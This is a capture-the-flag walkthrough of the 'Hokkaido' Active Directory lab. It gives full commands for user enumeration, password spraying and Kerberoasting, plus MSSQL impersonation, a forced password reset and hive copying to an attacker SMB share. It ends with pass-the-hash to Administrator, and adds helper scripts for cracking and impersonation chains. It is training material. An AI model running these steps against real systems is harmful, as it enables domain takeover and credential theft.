Initial Reconnaissance
To begin our investigation, we start with a comprehensive Nmap scan. This helps us find all open TCP ports and identify the services and versions running on each.
sudo nmap -Pn -n 192.168.244.40 -sC -sV -p- --open -v
Explanation of Nmap flags:
- -Pn: Treat the host as online without pinging it.
- -n: Don't resolve hostnames (faster scan).
- -sC: Run default scripts for basic service discovery.
- -sV: Attempt to detect service versions.
- -p-: Scan all TCP ports from 1 to 65535.
- --open: Show only ports that are open.
- -v: Enable verbose output.
Nmap Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 00:48:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.244.40:1433:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ms-sql-info:
| 192.168.244.40:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
|_SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T00:49:24+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T00:49:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
| Product_Version: 10.0.20348
|_ System_Time: 2025-05-25T00:49:15+00:00
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Issuer: commonName=dc.hokkaido-aerospace.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-24T00:46:07
| Not valid after: 2025-11-23T00:46:07
| MD5: 6a95:c688:b290:a487:8aef:4e1b:f548:593d
|_SHA-1: 6afe:2a34:f9b2:2755:068d:5ba2:f7d5:1e80:761b:3dda
|_ssl-date: 2025-05-25T00:49:24+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
8531/tcp open unknown
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49684/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
58538/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.244.40:58538:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ms-sql-info:
| 192.168.244.40:58538:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 58538
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
|_SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-25T00:49:17
|_ start_date: N/A
Key Observations from the Nmap Results:
- The host is a Windows Domain Controller (hostname DC, NetBIOS domain HAERO): DNS, Kerberos, LDAP/LDAPS, the global catalog (3268/3269), kpasswd (464) and Active Directory Web Services (9389) are all present.
- Notable services: Kerberos (88), LDAP (389/636), SMB (445), RDP (3389), WinRM (5985), MSSQL (1433 and 58538), plus IIS on 80 and on 8530/8531 (the default WSUS ports).
- The LDAP certificate is issued by hokkaido-aerospace-DC-CA, so an AD CS certificate authority exists in the domain; note that the certificate expired in December 2024.
- SMB signing is enabled and required, so NTLM relay to SMB on this host is not an option.
- The domain is hokkaido-aerospace.com and the domain controller hostname is dc.hokkaido-aerospace.com.
Add the following line to your /etc/hosts so that domain tools resolve the DC by name:
192.168.244.40 dc.hokkaido-aerospace.com
Active Directory Username Enumeration (Kerbrute)
We use Kerbrute to enumerate valid usernames. It sends Kerberos AS-REQs without pre-authentication, and the KDC answers differently for existing and non-existing principals (KDC_ERR_PREAUTH_REQUIRED versus KDC_ERR_C_PRINCIPAL_UNKNOWN), so valid names can be confirmed without triggering account lockouts.
./kerbrute userenum --dc dc.hokkaido-aerospace.com -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
- kerbrute userenum: Run the username enumeration module.
- --dc dc.hokkaido-aerospace.com: Specify the domain controller (DC) to talk to (discovered in the nmap scan).
- -d hokkaido-aerospace.com: Set the Active Directory domain name.
- /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt: A large wordlist of common usernames, used to test which ones exist in the domain.
Valid Usernames Discovered:
- info
- administrator
- discovery
Save these usernames in a file usernames.txt, and create a passwords.txt list of seasonal passwords plus each username as its own password:
Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discovery
SMB Password Spraying with NetExec
We use NetExec (nxc) to check if any username/password combination works against SMB.
nxc smb 192.168.244.40 --shares -u usernames.txt -p passwords.txt --continue-on-success
We discover that info:info is a valid login (the username used as its own password).
Let's list the shares using this credential:
nxc smb 192.168.244.40 --shares -u info -p info
We see a writable share called homes. We tried impacket-psexec with this credential to get a shell, but it did not work (psexec has to create a service on the host, which requires administrative rights, not just a writable share).
Using smbclient, we explore the homes share:
smbclient //192.168.244.40/homes -U info
In the homes share there are per-user directories, but nothing useful was found there.
Next, we explore the NETLOGON share:
smbclient //192.168.244.40/NETLOGON -U info
In the NETLOGON share there is a temp folder containing a file called password_reset.txt.
Let's obtain the file and see what is in it:
get password_reset.txt
In password_reset.txt we see the initial password: Start123!.
Password Re-spraying with New Credential
Try the new password across the known usernames:
nxc smb 192.168.244.40 --shares -u usernames.txt -p 'Start123!' --continue-on-success
We find another valid user: discovery:Start123!.
Update passwords.txt with the two passwords found so far:
info
Start123!
Testing WinRM Access
Try WinRM access with the credentials found so far:
nxc winrm 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We could also try Evil-WinRM, but neither account can log in over WinRM (membership in Remote Management Users or the local Administrators group is required).
Kerberoasting with Impacket
At this stage, we have a valid set of Active Directory credentials: discovery:Start123!. This allows us to attempt Kerberoasting, an attack that requests service tickets from the Kerberos Ticket Granting Service (TGS) and cracks them offline to recover service account passwords.
What is Kerberoasting? Kerberoasting targets accounts in Active Directory that have Service Principal Names (SPNs) assigned. When any authenticated domain user requests a service ticket for such an SPN, the domain controller returns a ticket whose encrypted part is protected with a key derived from the service account's password (for RC4-HMAC, etype 23, that key is the account's NT hash). No special privilege is needed to request the ticket; the attacker then brute-forces it offline against a wordlist. Cracking is only practical when the password is weak, and it is much slower for AES-encrypted tickets (etype 17/18) than for RC4.
Why use it here? We have already exhausted the simpler attacks (password spraying and SMB enumeration). Kerberoasting gives us a chance to escalate by targeting service accounts that may have weak passwords; such accounts often hold elevated privileges and can lead to further compromise.
What we hope to gain:
- Access to another user account (such as maintenance) that may have higher privileges.
- The ability to pivot into systems or services that are currently restricted.
Run the attack, writing the tickets to a file for hashcat:
impacket-GetUserSPNs -dc-ip 192.168.244.40 hokkaido-aerospace.com/discovery:Start123! -request -outputfile hashes.kerberoast
We get hashes for discovery and maintenance. Try to crack the maintenance user's hash (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4):
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
Unfortunately, we were not able to crack the hash with rockyou.txt.
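Before pointing hashcat at Kerberoast output it pays to check which encryption type each ticket actually uses, because mode 13100 only fits RC4 (etype 23) and an AES-only account silently yields etype 17/18 lines that need 19600/19700. The following added example (my code, not part of the original walkthrough, impacket or targetedKerberoast.py) parses the $krb5tgs$ lines that GetUserSPNs or targetedKerberoast.py produce, groups them by hashcat mode and emits one command per mode. The sample hashes are constructed (repeated hex bytes, made-up accounts in EXAMPLE.LOCAL), not tickets from the lab.

```python
"""Sort Kerberoast output by encryption type and choose the hashcat mode.

Added example for this walkthrough (not code from the lab or from impacket).
The hashes below are constructed, not tickets from the lab.
"""
import re
from collections import defaultdict

# Kerberos etype -> hashcat mode. 23 (RC4-HMAC) is the fast, common case;
# 17/18 (AES128/AES256) mean the account or domain enforces AES and cracking
# is far slower, so it is worth knowing which you have before you start.
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

# impacket formats RC4 and AES tickets differently (and writes ':' in the SPN as '~'):
#   RC4: $krb5tgs$23$*user$REALM$spn*$<16-byte checksum hex>$<edata hex>
#   AES: $krb5tgs$18$user$REALM$*spn*$<12-byte checksum hex>$<edata hex>
_RC4 = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")
_AES = re.compile(r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-f]{24})\$([0-9a-f]+)$")


def parse_krb5tgs(line):
    """Return the fields of one $krb5tgs$ line, or None if it is not a hash."""
    line = line.strip()
    m = _RC4.match(line)
    if m:
        user, realm, spn, _checksum, _edata = m.groups()
        etype = 23
    else:
        m = _AES.match(line)
        if m is None:
            return None
        etype_s, user, realm, spn, _checksum, _edata = m.groups()
        etype = int(etype_s)
    return {
        "user": user,
        "realm": realm,
        "spn": spn.replace("~", ":"),
        "etype": etype,
        "mode": HASHCAT_MODE[etype],
        "hash": line,
    }


def plan_cracking(lines):
    """Group hash lines by hashcat mode. Non-hash lines (banners or progress
    messages picked up from a stdout redirect) are kept under the key None so
    nothing is silently dropped."""
    plan = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        rec = parse_krb5tgs(line)
        plan[rec["mode"] if rec else None].append(line.strip())
    return dict(plan)


def hashcat_commands(plan, wordlist="/usr/share/wordlists/rockyou.txt", prefix="kerberoast"):
    """One hashcat invocation per mode; the caller writes plan[mode] to the named file."""
    return [
        "hashcat -m %d %s_%d.txt %s" % (mode, prefix, mode, wordlist)
        for mode in sorted(m for m in plan if m is not None)
    ]


# Constructed sample: a stray banner line, one RC4 ticket and one AES256 ticket.
SAMPLE_OUTPUT = [
    "Impacket-style banner line (constructed, not a hash)",
    "$krb5tgs$23$*svc_alpha$EXAMPLE.LOCAL$HTTP/web.example.local*$" + "ab" * 16 + "$" + "cd" * 48,
    "$krb5tgs$18$svc_beta$EXAMPLE.LOCAL$*MSSQLSvc/db.example.local~1433*$" + "12" * 12 + "$" + "34" * 48,
]

if __name__ == "__main__":
    plan = plan_cracking(SAMPLE_OUTPUT)
    for mode, hashes in plan.items():
        for h in hashes:
            rec = parse_krb5tgs(h)
            print(mode, rec["user"] if rec else "(not a hash)", rec["spn"] if rec else h)
    for cmd in hashcat_commands(plan):
        print(cmd)
```

Feed it the file written by -outputfile (or the captured stdout of targetedKerberoast.py); anything that lands under the None key is worth a look, since it is either tool noise or a hash format the regexes do not know.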
MSSQL Credential Spraying
We can also spray the credentials with NetExec against the MSSQL service:
nxc mssql 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We confirm valid credentials for info and discovery.
Next, we attempt to connect to Microsoft SQL Server using these credentials:
impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.244.40 -dc-ip 192.168.244.40 -windows-auth
Once inside, we want to look for sensitive or interesting databases. A good first step is to enumerate available databases:
SELECT name FROM master..sysdatabases;
We see five databases listed. One of them, hrappdb, stands out as possibly containing HR-related information.
USE hrappdb
SQL (HAERO\discovery guest@master)> use hrappdb
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.
Access is denied: our login discovery maps only to guest in master (as the prompt shows) and has no user mapping in hrappdb, so it cannot view the database's contents.
To get around this, we check whether our login is allowed to impersonate another SQL login:
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
SQL (HAERO\discovery guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
--------------
hrappdb-reader
This query lists the logins that appear as the grantor of an IMPERSONATE permission. It works as a quick check because, when IMPERSONATE is granted on a login, SQL Server records that login itself as the grantor; joining on a.major_id (the login being impersonated) and also selecting the grantee (a.grantee_principal_id) shows more precisely who may impersonate whom. Here hrappdb-reader is the login we are allowed to impersonate.
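The one-line query above answers the immediate question, but a practitioner usually wants the full picture: impersonation can be chained (EXECUTE AS A, then EXECUTE AS B from A's context), a grant to the public role applies to every login, an explicit DENY overrides a GRANT, and the thing that matters is whether any reachable login is a sysadmin. The following added example (my code, not from the walkthrough, impacket or Microsoft) walks that graph over rows returned by the T-SQL in IMPERSONATE_QUERY. LAB_ROWS mirror what the page shows (discovery may impersonate hrappdb-reader, which is not sysadmin); HYPOTHETICAL_ROWS add made-up logins (app_reader, deploy_svc) purely to exercise chaining, public grants and DENY handling, and are not from the lab.

```python
"""Resolve SQL Server impersonation chains from sys.server_permissions rows.

Added example for this walkthrough (mine, not code from the lab, impacket or
Microsoft). LAB_ROWS mirror the page; HYPOTHETICAL_ROWS are made up.
"""
from collections import defaultdict, deque

# T-SQL that yields the rows consumed below; run it as the low-privileged login.
# p.major_id is the login being impersonated; state 'G'/'W' = granted, 'D' = denied.
IMPERSONATE_QUERY = """
SELECT grantee.name AS grantee, target.name AS target, p.state,
       ISNULL(IS_SRVROLEMEMBER('sysadmin', target.name), 0) AS target_is_sysadmin
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE' AND p.class_desc = 'SERVER_PRINCIPAL';
"""

# Rows mirroring what the page shows: discovery may impersonate hrappdb-reader, which is not sysadmin.
LAB_ROWS = [("HAERO\\discovery", "hrappdb-reader", "G", 0)]

# Hypothetical rows (made-up logins, NOT from the lab) to exercise chaining, 'public' and DENY.
HYPOTHETICAL_ROWS = LAB_ROWS + [
    ("public", "app_reader", "G", 0),          # any login may become app_reader
    ("app_reader", "deploy_svc", "G", 1),      # ...and app_reader may become a sysadmin
    ("HAERO\\discovery", "sa", "G", 1),
    ("HAERO\\discovery", "sa", "D", 1),        # explicit DENY wins over the GRANT above
]


def build_graph(rows):
    """Map grantee -> set of logins it may EXECUTE AS; also return the sysadmin logins."""
    edges, sysadmins, denied = defaultdict(set), set(), set()
    for grantee, target, state, is_sysadmin in rows:
        if is_sysadmin:
            sysadmins.add(target)
        if state == "D":
            denied.add((grantee, target))
        else:
            edges[grantee].add(target)
    for grantee, target in denied:          # DENY overrides GRANT for the same pair
        edges[grantee].discard(target)
    return edges, sysadmins


def impersonation_chains(rows, start):
    """Breadth-first walk from `start`: {login: [EXECUTE AS statements that reach it]}."""
    edges, _ = build_graph(rows)
    chains = {}
    queue = deque([(start, [])])
    while queue:
        login, chain = queue.popleft()
        # grants to 'public' are usable by whichever login we are at this hop
        for target in sorted(edges.get(login, set()) | edges.get("public", set())):
            if target == start or target in chains:
                continue
            stmt = "EXECUTE AS LOGIN = '%s'" % target.replace("'", "''")
            chains[target] = chain + [stmt]
            queue.append((target, chains[target]))
    return chains


def sysadmin_targets(rows, start):
    """Logins reachable from `start` that are members of sysadmin (the real prize)."""
    _, sysadmins = build_graph(rows)
    return sorted(t for t in impersonation_chains(rows, start) if t in sysadmins)


if __name__ == "__main__":
    for name, rows in (("lab", LAB_ROWS), ("hypothetical", HYPOTHETICAL_ROWS)):
        print(name)
        for target, chain in impersonation_chains(rows, "HAERO\\discovery").items():
            print("  %s via %s" % (target, "; ".join(chain)))
        print("  sysadmin reachable:", sysadmin_targets(rows, "HAERO\\discovery"))
    # After any chain, one REVERT per EXECUTE AS returns to the original login.
```

Run IMPERSONATE_QUERY from the mssqlclient session, feed the rows in, and issue the returned EXECUTE AS statements in order; if sysadmin_targets is non-empty the next step is xp_cmdshell rather than reading a table, which is why checking the whole graph is worth the extra minute.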
We impersonate hrappdb-reader and switch to the database:
EXECUTE AS LOGIN = 'hrappdb-reader'
USE hrappdb;
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
Now we are in: the prompt shows we are running as hrappdb-reader and the database context has changed to hrappdb (REVERT would take us back to our own login). We start exploring its schema to find out what tables it contains:
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
hrappdb dbo sysauth b'BASE TABLE'
We discover a table called sysauth, which sounds like it could store credentials.
We query the table:
SELECT * FROM sysauth;
We discover the credential hrapp-service:Untimed$Runny.
We add the username and password to our wordlists and spray the credentials over smb, rdp and winrm:
nxc smb 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
nxc winrm 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
nxc rdp 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We can verify that hrapp-service:Untimed$Runny is a valid domain credential, but it does not give us access via RDP or WinRM at this stage.
BloodHound Analysis
Use bloodhound-python to analyse AD relationships:
bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.244.40
Start neo4j and run BloodHound:
sudo neo4j start
bloodhound&
Load the zip file into BloodHound and refresh the database. Mark hrapp-service as an owned principal.
Click on Node Info and, under Outbound Object Control, select First Degree Object Control. From here we can see that hrapp-service has GenericWrite over the Hazel.Green user, who belongs to the TIER2-ADMINS group.
If we right-click on GenericWrite and select Help, BloodHound explains how to abuse this privilege. GenericWrite on a user lets us set a servicePrincipalName on it, which makes the account Kerberoastable; targetedKerberoast.py automates adding a temporary SPN, requesting the service ticket and removing the SPN again.
We use targetedKerberoast.py to run a targeted Kerberoast attack:
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.244.40
We successfully get hashes for Hazel.Green, discovery and maintenance.
Since we already have the password for discovery, we only need to try cracking the hashes for Hazel.Green and maintenance:
sudo hashcat -m 13100 hazel.hash /usr/share/wordlists/rockyou.txt
Cracking the hash gives us the password for Hazel.Green: haze1988.
Privilege Escalation via Password Reset
Returning to BloodHound, we see that Molly.Smith is a member of the IT group.
Selecting Find Shortest Paths to Domain Admins shows that Molly.Smith is a high-value target.
Returning to Hazel.Green and selecting Explicit Object Controllers under Inbound Control Rights, we can see that Hazel.Green has a GenericAll relationship on the path towards Domain Admins. Right-clicking on GenericAll and selecting Help gives more information on how this can be abused.
GenericAll over a user object includes the right to reset its password, so with Hazel.Green's credentials we can force-change the password of Molly.Smith. (This is a destructive change: the user's existing password is lost. That is fine in a lab, but on a real engagement it needs explicit authorisation.)
Change password for Molly Smith:
net rpc password "molly.smith" "P@ssw0rd123" -U "hokkaido-aerospace.com"/"Hazel.Green"%"haze1988" -S "dc.hokkaido-aerospace.com"
We can validate the changed password by using NetExec:
nxc rdp 192.168.244.40 -u 'molly.smith' -p 'P@ssw0rd123'
We can now login to the target machine with RDP:
xfreerdp /u:molly.smith /p:'P@ssw0rd123' /v:192.168.244.40 /cert-ignore /auto-reconnect +clipboard /dynamic-resolution
The user flag local.txt is at C:\local.txt.
Extracting NTLM Hash from SAM and SYSTEM
Open cmd as administrator (Run as administrator, entering molly.smith's credentials at the UAC prompt) and check our privileges:
whoami /priv
Molly Smith holds SeBackupPrivilege. This Windows privilege lets a process read any file on the system for backup purposes, bypassing the normal ACL checks. Although it may show as "Disabled" in whoami /priv, that only means it is not currently enabled in the process token; it can be enabled by code, and backup-related operations such as reg save work with it.
Why is this useful for privilege escalation? Even though we do not have administrative rights yet, we can abuse SeBackupPrivilege to read sensitive files such as the SAM (Security Account Manager) and SYSTEM registry hives. Together these yield the password hashes of local accounts, including the built-in Administrator (SYSTEM holds the boot key needed to decrypt SAM). Note that on a domain controller the SAM holds only the local accounts, including the DSRM administrator; domain accounts live in NTDS.dit, which the same privilege can be used to copy.
We create a directory called temp and save copies of the registry hives there:
cd c:\
mkdir c:\temp
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
Then transfer them to our attacker machine and extract the hashes.
Set up SMB on Kali for a file transfer:
impacket-smbserver test . -smb2support -username kali -password kali
On the target machine, map the share (192.168.45.219 is the attacker machine) and copy the hives across:
net use m: \\192.168.45.219\test /user:kali kali
copy c:\temp\sam m:\
copy c:\temp\system m:\
Use impacket's secretsdump to extract the Administrator's NTLM hash offline from the SAM and SYSTEM hives:
impacket-secretsdump LOCAL -system system -sam sam
Use the recovered NT hash to pass-the-hash into an Administrator Evil-WinRM session (the -H argument takes the NT half of the LM:NT pair that secretsdump prints):
evil-winrm -i 192.168.244.40 -u Administrator -H 'd752482897d54e239376fddb2a2109e4'
The root flag proof.txt is on the Administrator's desktop.
Summary
In this walkthrough of the OffSec Proving Grounds Practice lab Hokkaido, we explored a simulated Active Directory environment and leveraged a range of techniques to escalate from unauthenticated access to full domain admin control. Starting with service enumeration and password spraying, we uncovered valid credentials and used Kerberoasting, SQL Server impersonation, and BloodHound analysis to discover privilege escalation paths. Key techniques included abusing SeBackupPrivilege
to dump NTLM hashes and using impersonation within MSSQL to access sensitive data. This lab demonstrates the importance of securing service accounts, hardening AD privileges, and monitoring credential exposure.